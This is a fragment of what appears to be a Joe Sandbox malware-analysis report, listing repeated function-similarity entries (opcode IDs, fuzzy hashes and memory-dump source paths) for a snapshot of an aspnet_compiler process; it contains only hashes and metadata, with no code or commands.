                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b505a158631eab3a627e8e8e1196eccb1e99c61af1cf471cf74708d8d6ab0c4d
                                                                                                                                                          • Instruction ID: b5d54fcc01757b777bcd6021592d77be9b8093471ced694456dfedc42200fdda
                                                                                                                                                          • Opcode Fuzzy Hash: b505a158631eab3a627e8e8e1196eccb1e99c61af1cf471cf74708d8d6ab0c4d
                                                                                                                                                          • Instruction Fuzzy Hash: A541F076A01206CBDB689F4DC880B9FBBF5FB94B04F14C02ADD519BA55D7359882CBA0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 89ea4dcfcd700ec451c4d82c1bfebc7d8bfec934cf2a5faac750f43f4867f17a
                                                                                                                                                          • Instruction ID: ef22c80c12c571fa17168ab1ca684485f977ea3a76ed7d52b047e61863aa473b
                                                                                                                                                          • Opcode Fuzzy Hash: 89ea4dcfcd700ec451c4d82c1bfebc7d8bfec934cf2a5faac750f43f4867f17a
                                                                                                                                                          • Instruction Fuzzy Hash: 9A416B755087469FD312DFA48880AAFB7E8BF84B54F44092AF9C4D7250E761DE058B93
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                          • Instruction ID: ed1007c5d3ccaa8e1b348293c1be9147e7106c2ee8deaf49036c39dccfc100f8
                                                                                                                                                          • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                          • Instruction Fuzzy Hash: 9A412B71B04211DFDB65DE9984C07BEBBA5EB50764F5980BAF9C69B240D6328D80CB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3a6a41e3fd67be725b60df84ed8c052ad2b2ba43a830b9f3da16606aef76247a
                                                                                                                                                          • Instruction ID: 81f5df4ed70a048b9f5c6c640cf0d56cc7e907efe9e58e8f63ad8706667cea3d
                                                                                                                                                          • Opcode Fuzzy Hash: 3a6a41e3fd67be725b60df84ed8c052ad2b2ba43a830b9f3da16606aef76247a
                                                                                                                                                          • Instruction Fuzzy Hash: 1B417A71600601EFD7A1CF18C840B6BBBF4FF58314F648A6AE889CB255E771E942CB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                          • Instruction ID: 5134d94cc544cd2e8b2fba3621fe2db920b6a937c1fa0dd6622a320674049c6f
                                                                                                                                                          • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                          • Instruction Fuzzy Hash: 36411871A04605EFDB24EF98C990AAABBF4FF18700B10496DE5D6D7654D330AA48CF94
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8a228eed100a53d22e5fb53c90ceee247cc889fe12764eaf2af3115e4cba0bbf
                                                                                                                                                          • Instruction ID: 93c930ad8609d57c3c9d45947f67a65b83b318bb8d9aefa79e597b526bf0324d
                                                                                                                                                          • Opcode Fuzzy Hash: 8a228eed100a53d22e5fb53c90ceee247cc889fe12764eaf2af3115e4cba0bbf
                                                                                                                                                          • Instruction Fuzzy Hash: BE4127B0501705CFCBA5EF68C940BAAB7F1FF49714F1481ADC9969B2A1DB309940CF90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c8b39429683661b156b778052757e8fbd8f7425154b5969c62e5eef6a44c9c99
                                                                                                                                                          • Instruction ID: 70a8b22c82e8749b82092d78b973ad31e7bd1107feb068ab59937579f1fb8f96
                                                                                                                                                          • Opcode Fuzzy Hash: c8b39429683661b156b778052757e8fbd8f7425154b5969c62e5eef6a44c9c99
                                                                                                                                                          • Instruction Fuzzy Hash: FE31DCB1A04305DFEB52DFA8C140799BBF0FB08728F2080AED199EB241D7329902CF90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 523b5c64857aaf396fb370610fa55bc79b34883989e5916e75edfc3559732232
                                                                                                                                                          • Instruction ID: 5473a276476a3b1bd98bdea5d7b6668cf4c20ff0cb56a16fb2d2822904d583dd
                                                                                                                                                          • Opcode Fuzzy Hash: 523b5c64857aaf396fb370610fa55bc79b34883989e5916e75edfc3559732232
                                                                                                                                                          • Instruction Fuzzy Hash: 6B41AEB1908301AFD760DF29C845B9BBBE8FF88664F004A2EF5D8C7251D7709845CB92
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c0cf30120bc9164427ba1308558f70206c0740da7ced7a9757447892d7243a32
                                                                                                                                                          • Instruction ID: 743ae9fff2c7aa69fb7fc94a4cebf66d882cf3de62715939138ffcf25be4668d
                                                                                                                                                          • Opcode Fuzzy Hash: c0cf30120bc9164427ba1308558f70206c0740da7ced7a9757447892d7243a32
                                                                                                                                                          • Instruction Fuzzy Hash: DE41C4726047469FC320DF69C850AAAB7E9FFC8700F14465DF99897684E730E914C7A6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3f4f0bd87309cbae09ca9f1b19f500e937f01de0991307c10234118f3cdabddb
                                                                                                                                                          • Instruction ID: 60a0c1cfb389bd647e9968f788474d87b6ff591bd952d8e7cd30a45eecdb4de1
                                                                                                                                                          • Opcode Fuzzy Hash: 3f4f0bd87309cbae09ca9f1b19f500e937f01de0991307c10234118f3cdabddb
                                                                                                                                                          • Instruction Fuzzy Hash: 7141C3702003068BD7A5DF18D885BABBBF9EF81764F14446DEAD5CB291EB30D891CB91
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                          • Instruction ID: c50e135b72c978a9dd57f9e5913efe51fbb0982ff7fdbcf7b1a3032563ee9f08
                                                                                                                                                          • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                          • Instruction Fuzzy Hash: 51312531A00255AFDB628B68CC80BEFBBECAF14350F0481A5F896D7356C2749984CBA4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fd497de56ef437c3020519f96fff35494586d359a0ab2cb2e68425adc1ccc6e4
                                                                                                                                                          • Instruction ID: 3138c23783e2b177496589f63a9c6cd17419cf67dd05c333352927ea7d503b9c
                                                                                                                                                          • Opcode Fuzzy Hash: fd497de56ef437c3020519f96fff35494586d359a0ab2cb2e68425adc1ccc6e4
                                                                                                                                                          • Instruction Fuzzy Hash: D031A875740706ABD722AF65CC81FAF76B8AB58B50F11002CF740AB691DAA5EC00C7E4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 78102ed8e5c03593e61afe0e4f98bbcba956227d6b843ee1923cf7fc9b844c4e
                                                                                                                                                          • Instruction ID: 5a570e4e4c466f288a2ee1ff70971d02170b7a36ec385013076d54a1455c84ce
                                                                                                                                                          • Opcode Fuzzy Hash: 78102ed8e5c03593e61afe0e4f98bbcba956227d6b843ee1923cf7fc9b844c4e
                                                                                                                                                          • Instruction Fuzzy Hash: 8931F632A052018FC33ADF1DD9C0E5A77E5FB81764F09447DEA958B695D770E840CB81
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d138c8b62a38bd089a67dfff1de07682a35b7980a5c3783b2769472e753f27b7
                                                                                                                                                          • Instruction ID: 663e73439e036dc1c951b7c9882208fb6365740931dc54863d1594f4c5594d80
                                                                                                                                                          • Opcode Fuzzy Hash: d138c8b62a38bd089a67dfff1de07682a35b7980a5c3783b2769472e753f27b7
                                                                                                                                                          • Instruction Fuzzy Hash: B741BD31200B459FD766CF28C880FDB7BE9AF49754F008469FAD98B261D774E844CB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b124e3bcf4f46e8b73dd587c7d7094d49e09e4dedc51fb67fdfa09598b18ddb0
                                                                                                                                                          • Instruction ID: ef9eb1af76a7fb6d18e06358fb837943882ba646aca5ed8983dfbb35cb69ad47
                                                                                                                                                          • Opcode Fuzzy Hash: b124e3bcf4f46e8b73dd587c7d7094d49e09e4dedc51fb67fdfa09598b18ddb0
                                                                                                                                                          • Instruction Fuzzy Hash: 6631D031A043018FD329DF28C990E2AB7E5FB85724F05452DFAA58BB90E770EC00CB92
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a97ed42f89202d8462dd1231b97eeac815bf52060f08def047baaf139aeb9e5e
                                                                                                                                                          • Instruction ID: a932c586d51e458164c72bd2dc5093e0ab9a8fd25f275229f28813de3e185712
                                                                                                                                                          • Opcode Fuzzy Hash: a97ed42f89202d8462dd1231b97eeac815bf52060f08def047baaf139aeb9e5e
                                                                                                                                                          • Instruction Fuzzy Hash: C231C6313016869BF326575CCD98B6E7FD8BB40F84F1D00E8ABC59B6D2DB28D841CA60
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8b0d4d3d0239c25e378675cf246025c42c396d50c64daa596feae2c87983def4
                                                                                                                                                          • Instruction ID: cccdf189d24018629827d71a46620e7e8f6cd9074c566f8cb044779b60dc2682
                                                                                                                                                          • Opcode Fuzzy Hash: 8b0d4d3d0239c25e378675cf246025c42c396d50c64daa596feae2c87983def4
                                                                                                                                                          • Instruction Fuzzy Hash: 3431E475A0011AABDB19DF98CC40BEEF7B9FB44B40F454168E900EB248D7B0ED01CB94
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 83adbd8128c6d23650651f797fa4e857852ceb5f3cf079862f504d3a8d51606f
                                                                                                                                                          • Instruction ID: 9393264727d1ad42365d07c07ca6c4fd68dc06079f4b8c20791d0f803dca6e06
                                                                                                                                                          • Opcode Fuzzy Hash: 83adbd8128c6d23650651f797fa4e857852ceb5f3cf079862f504d3a8d51606f
                                                                                                                                                          • Instruction Fuzzy Hash: D3316076A4012DABCF61DF54DC85BDEBBF9AB98350F1040E5AA48E7250CA309E918F90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ea436f10ec7d8494e62c2996a9db34598834065172e709165f85a9974143bfd9
                                                                                                                                                          • Instruction ID: 54d5976ae014434d188f171b8473f65a99b62b76c7d39801809381c98f4e7e27
                                                                                                                                                          • Opcode Fuzzy Hash: ea436f10ec7d8494e62c2996a9db34598834065172e709165f85a9974143bfd9
                                                                                                                                                          • Instruction Fuzzy Hash: 5C31B372E01219AFDB21DFA9CC40BEFBBF9EF04750F1144A5E996E7250D6709E009BA4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: bdafe3a9c99f9d0bc3e3aab9a6f4f463ce19336fce5e246aad097cae57518d26
                                                                                                                                                          • Instruction ID: d59ca2a52b466cf0c9af90db59088607ebb2c22d659fa9e9e6e8b464ef03591b
                                                                                                                                                          • Opcode Fuzzy Hash: bdafe3a9c99f9d0bc3e3aab9a6f4f463ce19336fce5e246aad097cae57518d26
                                                                                                                                                          • Instruction Fuzzy Hash: 4B31F475A00616AFDB2A9FA9C850BAEF7B9AF84B54F010079E505DB345DBB1DC00CB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d4cd8fa78a5e79fdc6acd1eb61f7b6146ae8f2ea0876b5b516d42397e0bd3f81
                                                                                                                                                          • Instruction ID: a5060db73c6691fd159ace6bc36c5684d1aef97dc296f92b5ae9b7e2e2214ac3
                                                                                                                                                          • Opcode Fuzzy Hash: d4cd8fa78a5e79fdc6acd1eb61f7b6146ae8f2ea0876b5b516d42397e0bd3f81
                                                                                                                                                          • Instruction Fuzzy Hash: 3631C072A04616EBC792DE68C880EBFBBE5AF94760F054529FDD5AB214DB30DC0187E1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ebb673cc7ec96215d918ed634ffb4bedcf10afbe410206aba8812b5a5ffa379c
                                                                                                                                                          • Instruction ID: 40697bd39816a19221889c72818c6901a2bcbf2399ab323d49ce74736feb0ad1
                                                                                                                                                          • Opcode Fuzzy Hash: ebb673cc7ec96215d918ed634ffb4bedcf10afbe410206aba8812b5a5ffa379c
                                                                                                                                                          • Instruction Fuzzy Hash: F9318B716193018FE3A4CF1AC880B6BBBE5BB88704F0489AEFDC59B251D770E844CB91
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                          • Instruction ID: 21be846a7d451f819247cc40697cb4670110cf8de656ea5a08b63ebc442414c0
                                                                                                                                                          • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                          • Instruction Fuzzy Hash: 7F3109B2B04A01EFD765EF69CD40B57BBF8BB08A50B04456EA5DAC3B50E630E9009B64
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 89c6fc49fed7909a2bd08163bba1bf8e0cdbc1d8799d3fee7f37ce6cfee239d0
                                                                                                                                                          • Instruction ID: c725c7735b5d2dfb147aba745460d681e191bc58ae87045aa84380ef3321337f
                                                                                                                                                          • Opcode Fuzzy Hash: 89c6fc49fed7909a2bd08163bba1bf8e0cdbc1d8799d3fee7f37ce6cfee239d0
                                                                                                                                                          • Instruction Fuzzy Hash: 2731DAB15053458FCB24DF19C541A5ABBF5FF89618F0549AEF5C89B221D330D942CBC2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 57baa07bd5e578adcd218a693d68f5fbf18d85684ff9a123fe5cec8bc0edbb39
                                                                                                                                                          • Instruction ID: 80f3cbad0814051527aee2d64705a660e0d54accd1107c2f0e2c74772d66cf1b
                                                                                                                                                          • Opcode Fuzzy Hash: 57baa07bd5e578adcd218a693d68f5fbf18d85684ff9a123fe5cec8bc0edbb39
                                                                                                                                                          • Instruction Fuzzy Hash: 2131D132F003069FD724EFA8C980AAEBBF9BB84704F008529D186D7254DB30ED41CB95
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                                          • Instruction ID: e6fbfdf317bb4014885cdfb4146576d02c14791728a17dfa3cd571fe4a59d40f
                                                                                                                                                          • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                                          • Instruction Fuzzy Hash: AB21F572E0125AABEB109FB98840BEFBBB5AF14750F058075AA95E7240E370D900C7A4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3f45ed2891f5ef4e9fda1b0669d0b9fcdeca26ee9ebfdc37d20dde24cd7a43ad
                                                                                                                                                          • Instruction ID: e252dc8c7f3cae38326751f55cf6d6a377d0e1ecd4f91e06bf453fcd1e165d4c
                                                                                                                                                          • Opcode Fuzzy Hash: 3f45ed2891f5ef4e9fda1b0669d0b9fcdeca26ee9ebfdc37d20dde24cd7a43ad
                                                                                                                                                          • Instruction Fuzzy Hash: EF313BB55002118BD735AF98CC40BAD7BB4BF55318F9481B9DDC59B742EA34D981CB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                          • Instruction ID: 88494c722869bc382c1083c37cd95ec770e3de3de3fa0c6a2fbc64975b925b3f
                                                                                                                                                          • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                          • Instruction Fuzzy Hash: 2D213E36A0065667CB1AAB95C800BFABB74FF40710F00815AF695CA6D2D774D940C7E0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ae33eb2fb170eab400914e26b93901f19f46298b2a597f400e5ffeba31801dbd
                                                                                                                                                          • Instruction ID: 4b2c309f8ac408d4820c611cafcc8c5647e7d99779e66f7a1a8c27dd8c5656d1
                                                                                                                                                          • Opcode Fuzzy Hash: ae33eb2fb170eab400914e26b93901f19f46298b2a597f400e5ffeba31801dbd
                                                                                                                                                          • Instruction Fuzzy Hash: 6431A271A0152C9BDB359F28CC81FEEB7B9BB55750F0101F1E685AB290DA789E818F90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                          • Instruction ID: cf26f2a38e5a55bcee865195a863a1d47dbbcc7d68be6714ec608eec16859e95
                                                                                                                                                          • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                          • Instruction Fuzzy Hash: F2218031A0070AEBCB15DF58C980A8EBBA5FF48318F118069EEA5DB241D671EA15CB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
